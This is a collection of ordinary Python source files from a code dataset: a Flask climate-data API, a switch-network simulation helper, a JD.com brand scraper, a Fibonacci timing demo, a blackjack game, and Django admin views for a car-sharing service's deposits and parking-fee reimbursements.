\"\n \"/api/v1.0/tobs\"\n )\n\n# precipitation API that lists date and precipitation in JSON\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n\n # query to find date and precipitation data from previous year, after 2016-08-18\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= \"2016-8-18\").\\\n order_by(Measurement.date).all()\n \n # create list comprehension for date, precipitation \n precipitation_date = [result[0] for result in results]\n precipitation_data = [result[1] for result in results]\n\n # place data in pd.DataFrame \n precipitation_df = pd.DataFrame({\n \"Date\": precipitation_date, \n \"Precipitation\": precipitation_data})\n\n # load dataframe as JSON \n precipitation_df = json.loads(precipitation_df.to_json(orient='records'))\n\n # return dictionary with key containing each date, precipitation data in JSON \n return jsonify(precipitation_df)\n\n\n# station API that lists all stations from CSV file in JSON\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n results = session.query(Station.id, Station.station, Station.name).all()\n all_stations = list(np.ravel(results))\n return jsonify(all_stations)\n \n # below is an alternative code that also works, where we use Pandas to\n # read the CSV file and reformat into JSON \n \n # df = pd.read_csv(\"Resources/hawaii_stations.csv\")\n # df = json.loads(df.to_json(orient='records'))\n # return jsonify(df)\n\n# temperature API that lists date and temperature in JSON\n@app.route(\"/api/v1.0/tobs\")\ndef temp():\n\n # query to find date and temperature data from previous year, after 2016-08-18\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date >= \"2016-8-18\").\\\n order_by(Measurement.date).all()\n\n # create list comprehension for date, temperature\n temp_date = [result[0] for result in results]\n temp_data = [result[1] for result in results]\n\n # place data in pd.DataFrame \n temp_df = pd.DataFrame({\n \"Date\": temp_date, \n \"Temperature\": temp_data})\n\n # load dataframe as JSON \n temp_df = json.loads(temp_df.to_json(orient='records'))\n\n # return dictionary with key containing each date, temperature data in JSON \n return jsonify(temp_df)\n\n# API to calculate tmin, tmax, tavg from START DATE \n@app.route(\"/api/v1.0/\")\ndef start_calculations(start):\n\n # create a query to list all dates from Measurement\n dates = session.query(Measurement.date)\n date_list =[date[0] for date in dates]\n\n # check if start date in date_list \n if start in date_list:\n\n # perform calculation using query \n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).all()\n\n # create empty list to store results\n result_calculations = []\n\n # create dictionary for results\n for n, a, m in results:\n calucation_start = {}\n calucation_start[\"Minimum Temperature\"] = n\n calucation_start[\"Avg Temperature\"] = a\n calucation_start[\"Max Temperature\"] = m\n result_calculations.append(calucation_start)\n \n # return results in JSON\n return jsonify(result_calculations)\n\n # return error message if start date not in dates database\n else:\n return jsonify({\"error\": f\"Start Date on {start} not found.\"}), 404\n\n# API to calculate tmin, tmax, tavg from a range of START DATE and END DATE\n@app.route(\"/api/v1.0//\")\ndef start_end_calculations(start, end):\n\n # create a query to list all dates from Measurement\n dates = 
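# Illustrative sketch, separate from the record above: the start/end routes
# compute tmin/tavg/tmax with SQLAlchemy's func helpers. A self-contained
# version of that aggregation pattern (in-memory SQLite, made-up readings;
# assumes SQLAlchemy 1.4+).
from sqlalchemy import create_engine, Column, Integer, Float, func
from sqlalchemy.orm import declarative_base, Session

Base = declarative_base()

class Reading(Base):
    __tablename__ = "reading"
    id = Column(Integer, primary_key=True)
    tobs = Column(Float)

engine = create_engine("sqlite://")
Base.metadata.create_all(engine)
with Session(engine) as session:
    session.add_all([Reading(tobs=t) for t in (61.0, 70.5, 58.2)])
    session.commit()
    tmin, tavg, tmax = session.query(
        func.min(Reading.tobs), func.avg(Reading.tobs), func.max(Reading.tobs)
    ).one()
    print(tmin, round(tavg, 2), tmax)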
session.query(Measurement.date)\n date_list =[date[0] for date in dates]\n\n # check if start and end date in date_list \n if start in date_list and end in date_list:\n\n # perform calculation \n results = calc_temps(start, end)\n\n # create empty list to store results\n final_calculations = []\n\n # create dictionary for results\n for n, a, m in results:\n calucation_dict = {}\n calucation_dict[\"Minimum Temperature\"] = n\n calucation_dict[\"Avg Temperature\"] = a\n calucation_dict[\"Max Temperature\"] = m\n final_calculations.append(calucation_dict)\n\n # return results in JSON\n return jsonify(final_calculations)\n \n # return error message if start date or end date not in dates database\n else: \n return jsonify({\"error\": f\"Start Date on {start} or End Date {end} not found.\"}), 404 \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"614052207","text":"\nclass Library:\n switches = {}\n port_mapping = {}\n switch_mapping = {}\n root_switch = None\n commands = []\n\n @staticmethod\n def cleanTest():\n Library.switches = {}\n Library.port_mapping = {}\n Library.switch_mapping = {}\n Library.root_switch = None\n Library.commands = []\n\n @staticmethod\n def send(sender_mac, sender_port, frame):\n Library.commands.append(str(format(sender_mac, '02x')) + str(format(sender_port, '02x')) + \"-\" + frame)\n\n if sender_mac in Library.port_mapping:\n if Library.port_mapping.get(sender_mac) is None:\n return\n\n switch_id = Library.port_mapping.get(sender_mac).get(sender_port)\n if (Library.switch_mapping.get(switch_id) is None) or (Library.switches.get(switch_id) is None):\n return\n receivingport = Library.switch_mapping.get(switch_id).get(sender_mac)\n Library.switches.get(switch_id).receive(receivingport, frame)\n else:\n print(\"Sender MAC doesn't exist\")\n\n @staticmethod\n def init_test():\n Library.switches.get(Library.root_switch).receive(-1, \"010000FFFF0000\")\n Library.commands = []\n\n @staticmethod\n def get_calls():\n return Library.commands\n\n @staticmethod\n def add_switch(switch, mac_root, mac_switch):\n Library.root_switch = mac_root\n Library.switches[mac_switch] = switch\n\n @staticmethod\n def add_connection(sw1, port1, sw2, port2):\n if sw1 not in Library.port_mapping:\n Library.port_mapping[sw1] = {}\n\n if sw2 not in Library.port_mapping:\n Library.port_mapping[sw2] = {}\n\n Library.port_mapping[sw1][port1] = sw2\n Library.port_mapping[sw2][port2] = sw1\n\n if sw1 not in Library.switch_mapping:\n Library.switch_mapping[sw1] = {}\n\n if sw2 not in Library.switch_mapping:\n Library.switch_mapping[sw2] = {}\n\n Library.switch_mapping[sw1][sw2] = port1\n Library.switch_mapping[sw2][sw1] = port2","sub_path":"Assignment 2/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"364783566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 25 16:19:20 2017\n爬取品牌\n1.根据category_level3_id\n2.https://list.jd.com/list.html?cat=三级类别编码&trans=1&md=1&my=list_brand\n3.没有禁爬\n\"\"\"\n\nimport requests\nimport json\nimport datetime\n\n#下载网页,若失败返回空文本\ndef load(category_level3_id):\n url = 'https://list.jd.com/list.html'\n params = {'cat' : category_level3_id,\n 'trans' : 1,\n 'md' : 1,\n 'my' : 'list_brand'}\n try:\n response = requests.get(url, 
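# Illustrative sketch, separate from the record above: the brand loader passes
# query parameters as a dict so requests handles the URL encoding itself;
# httpbin.org and the category id below are placeholders, not the real API.
import requests

params = {"cat": "737,794,798", "trans": 1, "md": 1, "my": "list_brand"}
resp = requests.get("https://httpbin.org/get", params=params, timeout=10)
print(resp.url)  # parameters are encoded into the query string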
params=params)\n txt = response.text\n except:\n print('error: get_brand.load: %s' % category_level3_id)\n txt = ''\n return txt\n \n#解析网页,返回品牌列表,若失败返回空\ndef parse(txt):\n brands_list = []\n try:\n txt_dict = json.loads(txt)\n catalog_level1_name = txt_dict['summary']['cate_infos']['cat1_name']\n catalog_level2_name = txt_dict['summary']['cate_infos']['cat2_name']\n catalog_level3_name = txt_dict['summary']['cate_infos']['cat3_name']\n brands = txt_dict['brands']\n now = datetime.datetime.now()\n crawl_time = now.strftime('%Y-%m-%d %H:%M:%S')\n if brands is not None:\n for brand in brands:\n brand_id = str(brand['id'])\n brand_name = brand['name']\n brand_record = [catalog_level3_name, catalog_level2_name,\n catalog_level1_name, brand_id, brand_name, crawl_time]\n brands_list.append(brand_record)\n else:\n brands_list = [] \n except:\n brands_list = []\n print('error: get_brand.parse')\n return brands_list\n \n\n\n","sub_path":"brand/get_brand.py","file_name":"get_brand.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"13019022","text":"#Bagaimana cara mengukur waktu eksekusi dari sebuah Script Python\n\n#Gunakan script dibawah ini untuk mengukur waktu eksekusi\n\"\"\"\"\n#==========================================\n\nimport time\n\nstart = time.time()\n\n#tulislah code program anda disini\n\nend = time.time()\n\nexecution_time = end - start\n\nprint (\"Execution Time: %s second\" %execution_time)\n\n#============================================\n\"\"\"\n\n\n#Contoh penggunaan script untuk menghitung deret fibonacci\n\nimport time\nstart = time.time()\n#Menulis program untuk deret fibonacci\n#tentukan jumlah deret fibonacci\nAngka = 100\n# tentukan angka pertama\nn1 = 0\n# tentukan angka kedua\nn2 = 1\n# jumlah angka yang dihitung\ncount = 2\n# periksa angka\nif Angka <= 0:\n print(\"Angka harus di atas 0\")\nelif Angka == 1:\n print(\"Deret fibonacci : \",Angka,\":\")\n print(n1)\nelse:\n print(\"Deret fibonacci : \",Angka,\":\")\n print(n1,\",\",n2,end=', ')\n while count < Angka:\n nth = n1 + n2\n print(nth,end=' , ')\n # tukar nilai untuk mendapatkan 2 index terakhir\n n1 = n2\n n2 = nth\n count += 1\n\nend = time.time()\n\nexecution_time = end - start\n\nprint (\"Execution Time: %.10s second\" %execution_time)","sub_path":"execution_time.py","file_name":"execution_time.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"204626132","text":"from random import shuffle\n\nclass Card(object):\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def card_v(self):\n if self.rank in \"TJQK\":\n return 10\n else:\n return \" A23456789\".index(self.rank)\n\n def get_rank(self):\n return self.rank\n\n def __str__(self):\n return \"%s%s\" % (self.rank, self.suit)\n\n\nclass Hand(object):\n def __init__(self, name):\n self.name = name\n self.cards = []\n\n def add_card(self, card):\n self.cards.append(card)\n\n def get_v(self):\n result = 0\n aces = 0\n for card in self.cards:\n result += card.card_v()\n if card.get_rank() == \"A\":\n aces += 1\n\n if result + aces * 10 <= 21:\n result += aces * 10\n return result\n\n def __str__(self):\n text = \"%s's contains:\\n\" % self.name\n for card in self.cards:\n text += str(card) + \" \"\n text += \"\\nHand Value: \" + str(self.get_v())\n return text\n\n\nclass Deck(object):\n def __init__(self):\n ranks = \"23456789TJQKA\"\n suits = 
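# Illustrative sketch, separate from the record above: the timing recipe in
# execution_time.py uses time.time(); time.perf_counter() is the
# higher-resolution clock intended for measuring elapsed intervals. The
# workload below is a stand-in.
import time

start = time.perf_counter()
total = sum(range(1_000_000))  # placeholder workload
elapsed = time.perf_counter() - start
print(f"Execution time: {elapsed:.6f} s (result={total})")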
\"DCHS\"\n self.cards = [Card(r, s) for r in ranks for s in suits]\n shuffle(self.cards)\n\n def deal_cards(self):\n return self.cards.pop()\n\n\ndef new_game(money):\n d = Deck()\n player_hand = Hand('Player')\n dealer_hand = Hand('Dealer')\n player_hand.add_card(d.deal_cards())\n player_hand.add_card(d.deal_cards())\n dealer_hand.add_card(d.deal_cards())\n print(dealer_hand)\n print(\"=\"*20)\n print(player_hand)\n in_game = True\n while player_hand.get_v() < 21:\n ans = input(\"Hit or stand? (h/s) \\n\")\n if ans == 'h':\n player_hand.add_card(d.deal_cards())\n print(player_hand)\n if player_hand.get_v()>21:\n print(\"You Loose\")\n money -=5\n in_game = False\n break\n elif ans=='s':\n print(\"You stand\")\n break\n else:\n print(\"Error\")\n print('='*20)\n if in_game:\n while dealer_hand.get_v() < 17:\n dealer_hand.add_card(d.deal_cards())\n print(dealer_hand)\n if dealer_hand.get_v() > 21:\n print(\"Dealer bust\")\n money+=5\n in_game = False\n if in_game:\n if player_hand.get_v()>dealer_hand.get_v():\n print(\"You win\")\n money+=5\n else:\n print(\"Dealer win\")\n money-=5\n return money\n\n\nif __name__ == '__main__':\n money = int(input())\n print(\"You have %d$\" % money)\n while money>0:\n money = new_game(money)\n print(\"You have %d$\\n\" % money)\n print(\"\\nYou spent all your money!\")\n\n\n\n","sub_path":"Адаптивный тренажер Python/Black_Jack.py","file_name":"Black_Jack.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"230952101","text":"import logging\nimport time\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\n\nfrom django.conf import settings\nfrom django.db import transaction\nfrom django_filters import rest_framework as filters\nfrom rest_framework import mixins, viewsets, generics\nfrom rest_framework import status, exceptions\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom customer.utils import TransferStatus, save_parking_fee_withdraw_success_data, \\\n save_parking_fee_withdraw_unknow_data\nfrom deposit.models import MemberDepositRecord\nfrom operation.app_push_template import AppPushTemplate\nfrom operation.models import MemberDuesRecord, AccountRecord, Customer\nfrom order.models import ParkingFee, Order\nfrom permission.permissions import CanConfirmDeposit, DepositOperation, \\\n CanReturnDeposit, \\\n DueOperation, CanCheckParkingFee, ParkingFeeOperation\nfrom wechat.helpers import transfer_to_wechat\nfrom wechat.message_template import TO_DO_REMIND\nfrom wechat.message_template_data import apply_parking_fee_fail\nfrom wechat.tasks import send_template_msg\nfrom wechat.wechat_msg_utils import get_user_info, UseCarAccountChangeType, \\\n sent_account_changed_msg, AccountDescType, send_parking_fee_apply_pass_msg, Target\nfrom zerocar.utils import date_str_to_timestamp, Sources, ExportMixin, \\\n date_str_to_date, save_app_push_msg, to_cent, DepositGrades\nfrom .serializers import DepositRecordSerializer, DuesRecordSerializer, \\\n ParkingFeeSerializer, \\\n ParkingFeeVASerializer, \\\n DepositRecordVASerializer, BatchDepositRecordSerializer, \\\n BatchPayDepositRecordSerializer\n\nlogger = logging.getLogger('zerocar')\n\n\nclass DepositApiSet(ExportMixin, mixins.ListModelMixin, mixins.RetrieveModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n list:\n 会员违章预缴金记录列表,搜索条件:申请起止时间用start、end指定,确认起止时间用ck_stime、ck_etime指定\n read:\n 会员违章预缴金详情\n 
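# Illustrative sketch, separate from the record above: Hand.get_v upgrades
# *all* aces by 10 only when every upgrade fits, so A + 9 + A scores 11;
# upgrading aces one at a time gives the usual blackjack value of 21.
def hand_value(ranks):
    total = sum(10 if r in "TJQK" else " A23456789".index(r) for r in ranks)
    aces = ranks.count("A")
    while aces and total + 10 <= 21:
        total += 10
        aces -= 1
    return total

assert hand_value(list("A9A")) == 21
assert hand_value(list("AKQ")) == 21
assert hand_value(list("AA")) == 12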
delete:\n 删除会员违章预缴金记录\n export:\n 导出excel文件\n \"\"\"\n permission_classes = (DepositOperation, )\n serializer_class = DepositRecordSerializer\n search_fields = ('customer__nick_name', 'customer__member__real_name', 'customer__mobile',\n 'trade_record__trade_code', 'trade_record__trade_sn')\n filter_fields = ('state', 'client')\n export_param = dict(\n fields=('real_name', 'mobile', 'amount', 'created_at', 'state_name', 'return_pay_at',\n 'return_amount', 'member_memo', 'pay_at', 'trade_code', 'trade_sn',\n 'apply_return_at', 'mod_amount', 'mod_desc', 'confirm_at', 'client_description',\n 'trade_account_type_name'),\n headers=('姓名', '手机号', '金额', '创建时间', '状态', '退还支付时间', '退还金额', '会员备注', '违章预缴金缴纳时间', '交易单号',\n '第三方平台交易号', '申请退还违章预缴金时间', '扣款金额(元)', '扣款描述', '退还确认时间', '来源', '支付来源'))\n\n def get_queryset(self):\n filters = dict()\n start_timestamp = date_str_to_timestamp(self.request.query_params.get('start'))\n end_timestamp = date_str_to_timestamp(self.request.query_params.get('end'), end_of_day=True)\n ck_start_timestamp = date_str_to_timestamp(self.request.query_params.get('ck_stime'))\n ck_end_timestamp = date_str_to_timestamp(\n self.request.query_params.get('ck_etime'), end_of_day=True)\n grade_type = self.request.query_params.get('grade_type')\n\n try:\n grade_type = int(grade_type)\n except (TypeError, ValueError):\n grade_type = None\n\n if grade_type == DepositGrades.LEVEL1:\n filters['amount'] = settings.DEPOSIT_LV1\n elif grade_type == DepositGrades.LEVEL2:\n filters['amount'] = settings.DEPOSIT_LV2\n elif grade_type == DepositGrades.UPGRADE:\n filters['amount'] = settings.UPGRADE_DEPOSIT\n\n if start_timestamp:\n filters['apply_return_time__gte'] = start_timestamp\n if end_timestamp:\n filters['apply_return_time__lte'] = end_timestamp\n if ck_start_timestamp:\n filters['ck_time__gte'] = ck_start_timestamp\n if ck_end_timestamp:\n filters['ck_time__lte'] = ck_end_timestamp\n\n return MemberDepositRecord.objects.all().select_related(\n 'customer__member', 'trade_record').filter(**filters).order_by('-id')\n\n\nclass DuesRecordApiSet(ExportMixin, mixins.ListModelMixin, mixins.RetrieveModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n list:\n 会员会费记录列表,搜索条件:起止时间用start、end指定\n read:\n 会员会费记录详情\n delete:\n 删除会员会费记录\n export:\n 导出excel文件\n \"\"\"\n permission_classes = (DueOperation, )\n serializer_class = DuesRecordSerializer\n search_fields = ('customer__nick_name', 'customer__mobile', 'service_city__area_name')\n filter_fields = ('state', 'client')\n export_param = dict(\n fields=('nick_name', 'mobile', 'amount', 'city_name', 'created_at', 'pay_name',\n 'grade_name', 'member_sdate', 'member_edate', 'real_name', 'client_description'),\n headers=('昵称', '手机号', '金额', '城市', '会费缴纳时间', '支付方式', '会员等级', '会员开始时间', '会员结束时间', '真实姓名',\n '来源'))\n\n def get_queryset(self):\n filters = dict()\n start_timestamp = date_str_to_timestamp(self.request.query_params.get('start'))\n end_timestamp = date_str_to_timestamp(self.request.query_params.get('end'), end_of_day=True)\n if start_timestamp:\n filters['cr_time__gte'] = start_timestamp\n if end_timestamp:\n filters['cr_time__lte'] = end_timestamp\n\n return MemberDuesRecord.objects.all().select_related(\n 'customer', 'service_city').filter(**filters).order_by('-id')\n\n\nclass ParkingFeeFilter(filters.FilterSet):\n # 对停车费报销记录创建时间进行筛选\n start = filters.DateFilter(name=\"cr_time\", lookup_expr='gte')\n min_amount = filters.NumberFilter(name='amounts', lookup_expr='gte')\n max_amount = filters.NumberFilter(name='amounts', lookup_expr='lte')\n\n class Meta:\n 
model = ParkingFee\n fields = ('start', 'state', 'order__trip__start_car_outlet', 'order__order_type',\n 'min_amount', 'max_amount', 'target')\n\n\nclass ParkingFeeApiSet(ExportMixin, mixins.ListModelMixin, mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin, viewsets.GenericViewSet):\n \"\"\"\n list:\n 会员停车费报销记录列表,搜索条件:起止时间用start、end指定\n read:\n 停车报销记录详情\n update:\n 修改停车报销记录的备注\n export:\n 导出excel文件\n \"\"\"\n permission_classes = (ParkingFeeOperation, )\n serializer_class = ParkingFeeSerializer\n search_fields = ('order__order_no', 'order__user_mobile', 'order__user_real_name',\n 'order__car_number', 'order__s_addr', 'order__e_addr', 'order__user_nick_name',\n 'op_source', 'op_user')\n filter_class = ParkingFeeFilter\n export_param = dict(\n fields=('real_name', 'mobile', 'service_city_name', 'state_name', 'amounts', 'car_number',\n 'co_name_s', 'co_name_e', 'last_order_time_diff', 'order_start_time',\n 'order_trip_mileage', 'memo', 'cr_time', 'target_name'),\n headers=('姓名', '手机号', '城市', '状态', '金额', '车牌号', '开始网点', '结束网点', '与上次订单时间差', '订单时间', '行驶里程',\n '备注', '申请时间', '报销账户'))\n\n def get_queryset(self):\n queryset = ParkingFee.objects.all().select_related('order__trip').order_by('-cr_time')\n end = self.request.query_params.get('end')\n end = date_str_to_date(end)\n if end:\n queryset = queryset.filter(cr_time__lte=end + timedelta(days=1))\n\n return queryset\n\n def get_serializer_context(self):\n return self.request.query_params\n\n\nclass ApplyParkingFee(generics.GenericAPIView):\n \"\"\"\n 审核停车费报销的操作,参数op(0: 不通过,1:报销), amounts, op_desc\n \"\"\"\n serializer_class = ParkingFeeVASerializer\n permission_classes = (CanCheckParkingFee, )\n\n class Ops:\n PASS = 1\n FAIL = 0\n\n names = {PASS: '允准报销', FAIL: '不通过'}\n\n @transaction.atomic\n def post(self, request, id_):\n parking_fee = get_object_or_404(ParkingFee, pk=id_)\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n if parking_fee.state in (ParkingFee.States.DELETED, ParkingFee.States.REIMBURSED):\n return Response('已删除和已报销状态记录不能操作', status.HTTP_412_PRECONDITION_FAILED)\n op = serializer.validated_data['op']\n amounts = serializer.validated_data.get('amounts', 0)\n op_desc = serializer.validated_data.get('op_desc')\n state = parking_fee.state\n if op == ApplyParkingFee.Ops.PASS and state != ParkingFee.States.APPLIED:\n return Response('非申请状态的记录不能报销', status.HTTP_412_PRECONDITION_FAILED)\n parking_fee.amounts = amounts\n parking_fee.op_time = datetime.now()\n parking_fee.op_source = Sources.BONUS_INCOME\n parking_fee.op_user = request.user.username\n parking_fee.op_desc = op_desc\n\n if op == ApplyParkingFee.Ops.FAIL:\n parking_fee.state = ParkingFee.States.REJECTED\n parking_fee.last_operator = request.user\n parking_fee.save()\n # 停车费报销未通过模板消息\n customer = parking_fee.order.customer\n wx_msg = apply_parking_fee_fail(get_user_info(customer), parking_fee)\n if settings.ENVIRONMENT != 'DEVELOPMENT':\n send_template_msg.delay(customer.wx_openid, TO_DO_REMIND, wx_msg)\n # 推送app消息: 停车费报销未通过\n save_app_push_msg(AppPushTemplate.parking_fee_apply_fail(parking_fee), customer)\n elif op == ApplyParkingFee.Ops.PASS:\n # 允准报销 需要处理会员的账户可以余额\n customer = Customer.objects.select_related('member').select_for_update().get(\n id=parking_fee.order.customer_id)\n cr_time = int(datetime.now().timestamp())\n parking_fee.last_operator = request.user\n if parking_fee.target == ParkingFee.Targets.CASH_ACCOUNT:\n AccountRecord(\n customer=customer,\n account_type=AccountRecord.AccountType.CASH,\n 
cr_time=cr_time,\n source_id=parking_fee.order.pk,\n accinout_type=AccountRecord.AccinoutType.PARKING_FEE,\n amount=amounts,\n source_type=Sources.ORDER,\n desc='报销停车费',\n last_operator=request.user).save()\n parking_fee.state = ParkingFee.States.REIMBURSED\n parking_fee.save()\n customer.member.cash_account += amounts\n customer.member.save()\n # 停车费报销通过发送用车余额变动通知模板消息\n sent_account_changed_msg(AccountDescType.CASH, amounts,\n UseCarAccountChangeType.PARKING_FEE, customer, cr_time)\n # 发送微信消息\n send_parking_fee_apply_pass_msg(customer, Target.CASH, amounts, cr_time)\n # 推送app消息: 停车费报销通过通知\n save_app_push_msg(AppPushTemplate.parking_fee_apply_success(parking_fee), customer)\n\n elif parking_fee.target == ParkingFee.Targets.WECHAT:\n amount = int(amounts * 100)\n desc = '停车费报销至微信零钱'\n partner_trade_no = f'{int(time.time()*1000000)}888{\"%07d\"% customer.id}'\n transfer_msg = transfer_to_wechat(customer.wx_openid, amount, desc,\n partner_trade_no, customer)\n transfer_result, transfer_data = transfer_msg['result'], transfer_msg[\n 'transfer_data']\n amount = Decimal(amount / 100)\n if transfer_result == TransferStatus.SUCCESS:\n save_parking_fee_withdraw_success_data(parking_fee, amount, transfer_data,\n partner_trade_no, request.user)\n\n # 发送微信消息\n send_parking_fee_apply_pass_msg(customer, Target.WECHAT, amount, cr_time)\n # 推送app消息: 停车费报销通过通知\n save_app_push_msg(\n AppPushTemplate.parking_fee_apply_success(parking_fee), customer)\n return Response(transfer_msg)\n elif transfer_result == TransferStatus.FAIL:\n logger.info(f'[停车费报销至微信零钱失败] 原因:{transfer_data},'\n f'用户[{customer.id}]报销{amount}元,订单号:{partner_trade_no}')\n return Response(transfer_msg)\n else:\n try:\n query_transfer_result = transfer_msg['transfer_data'][\n 'query_transfer_result']\n except Exception:\n query_transfer_result = {'detail_id': ''}\n\n save_parking_fee_withdraw_unknow_data(customer, amount, query_transfer_result,\n partner_trade_no)\n logger.info(f'[停车费报销至微信零钱失败结果待查询] 原因:{transfer_data},'\n f'用户[{customer.id}]报销{amount}元,订单号:{partner_trade_no}')\n return Response(transfer_msg)\n\n elif parking_fee.target == ParkingFee.Targets.BONUS_ACCOUNT:\n AccountRecord.objects.create(\n customer=customer,\n account_type=AccountRecord.AccountType.BONUS,\n cr_time=cr_time,\n source_id=parking_fee.order.pk,\n accinout_type=AccountRecord.AccinoutType.PARKING_FEE,\n amount=amounts,\n source_type=Sources.ORDER,\n desc='报销停车费',\n last_operator=request.user)\n parking_fee.state = ParkingFee.States.REIMBURSED\n parking_fee.save()\n customer.member.bonus_account += amounts\n customer.member.save()\n # 停车费报销通过发送红包余额变动通知模板消息\n sent_account_changed_msg(AccountDescType.RED_ENVELOPE, amounts,\n UseCarAccountChangeType.PARKING_FEE, customer, cr_time)\n # 发送微信消息\n send_parking_fee_apply_pass_msg(customer, Target.BONUS, amounts, cr_time)\n # 推送app消息: 停车费报销通过通知\n save_app_push_msg(AppPushTemplate.parking_fee_apply_success(parking_fee), customer)\n else:\n raise exceptions.ValidationError({'detail': '非法的报销target'})\n\n return Response('success')\n\n\nclass ConfirmReturnDeposit(generics.GenericAPIView):\n \"\"\"\n 确认退还违章预缴金申请的操作,参数 mod_amount\n \"\"\"\n serializer_class = DepositRecordVASerializer\n permission_classes = (CanConfirmDeposit, )\n\n @transaction.atomic\n def post(self, request, id_):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_record = get_object_or_404(MemberDepositRecord, pk=id_)\n\n un_finish_order = 
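# Illustrative sketch, separate from the record above: the WeChat-transfer
# branch derives a partner trade number from a microsecond timestamp, a fixed
# "888" marker and a zero-padded customer id; the id below is made up.
import time

def make_partner_trade_no(customer_id: int) -> str:
    return f"{int(time.time() * 1_000_000)}888{customer_id:07d}"

print(make_partner_trade_no(42))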
Order.objects.filter(customer__id=deposit_record.customer.id).exclude(\n state=Order.States.FINISH)\n\n if deposit_record.grade_type == DepositGrades.UPGRADE:\n un_finish_order = un_finish_order.filter(\n day_rent_set_menu__deposit_level=DepositGrades.LEVEL2)\n\n if un_finish_order.exists():\n return Response('该用户存在未完成的订单', status.HTTP_412_PRECONDITION_FAILED)\n if deposit_record.state != MemberDepositRecord.States.APPLY_RETURN:\n return Response('非退款申请状态不允许确认', status.HTTP_412_PRECONDITION_FAILED)\n\n mod_amount = serializer.validated_data.get('mod_amount', 0)\n if mod_amount > deposit_record.amount:\n return Response('扣款金额大于违章预缴金金额', status.HTTP_412_PRECONDITION_FAILED)\n\n if deposit_record.grade_type == DepositGrades.LEVEL1 and \\\n MemberDepositRecord.objects.curr_up(state=MemberDepositRecord.States.APPLY_RETURN,\n customer=deposit_record.customer).exists():\n return Response('该用户有两笔退款申请,请先操作%s的退款确认' % to_cent(settings.UPGRADE_DEPOSIT),\n status.HTTP_412_PRECONDITION_FAILED)\n\n deposit_record.mod_amount = mod_amount\n deposit_record.return_amount = deposit_record.amount - mod_amount\n deposit_record.state = MemberDepositRecord.States.CONFIRMED\n deposit_record.return_op_user_id = request.user.id\n deposit_record.ck_time = int(datetime.now().timestamp())\n deposit_record.last_operator = request.user\n deposit_record.save()\n return Response('success')\n\n\nclass BatchConfirmReturnDeposit(generics.GenericAPIView):\n \"\"\"\n 批量确认退还违章预缴金申请的操作 参数ids,需要批量操作的违章预缴金记录id数组\n \"\"\"\n serializer_class = BatchDepositRecordSerializer\n permission_classes = (CanConfirmDeposit, )\n\n @transaction.atomic\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n deposit_records = serializer.validated_data['ids']\n\n errors = self.check_errors(deposit_records)\n\n if errors:\n return Response(','.join(errors.values()), status.HTTP_412_PRECONDITION_FAILED)\n\n for deposit_record in deposit_records:\n deposit_record.return_amount = deposit_record.amount\n deposit_record.state = MemberDepositRecord.States.CONFIRMED\n deposit_record.return_op_user_id = request.user.id\n deposit_record.ck_time = int(datetime.now().timestamp())\n deposit_record.last_operator = request.user\n deposit_record.save()\n return Response('success')\n\n @staticmethod\n def check_errors(deposit_records):\n errors = {}\n for deposit_record in deposit_records:\n un_finish_order = Order.objects.filter(customer__id=deposit_record.customer.id).exclude(\n state=Order.States.FINISH)\n\n if deposit_record.grade_type == DepositGrades.UPGRADE:\n un_finish_order = un_finish_order.filter(\n day_rent_set_menu__deposit_level=DepositGrades.LEVEL2)\n\n customer = deposit_record.customer\n if not un_finish_order.exists():\n if deposit_record.grade_type == DepositGrades.LEVEL1 and \\\n MemberDepositRecord.objects.curr_up(customer=deposit_record.customer,\n state=MemberDepositRecord.States.APPLY_RETURN).exists():\n errors[customer.mobile] = '用户: %s [%s] 有两笔退款申请,请先操作%s的退款确认!' % \\\n (customer.nick_name, customer.mobile, to_cent(settings.UPGRADE_DEPOSIT))\n continue\n else:\n order = un_finish_order.first()\n errors[customer.mobile] = '用户: %s [%s] 有 %s 订单,无法确认!' 
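# Illustrative sketch, separate from the record above: the batch endpoints
# validate every record first and mutate state only when none fails; the shape
# of that pattern in plain Python (records and the rule are made up).
def check(record):
    errors = []
    if record["state"] != "CONFIRMED":
        errors.append(f"record {record['id']}: not in a payable state")
    return errors

records = [{"id": 1, "state": "CONFIRMED"}, {"id": 2, "state": "APPLIED"}]
all_errors = [e for r in records for e in check(r)]
if all_errors:
    print("; ".join(all_errors))  # reject the whole batch
else:
    print("pay all records")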
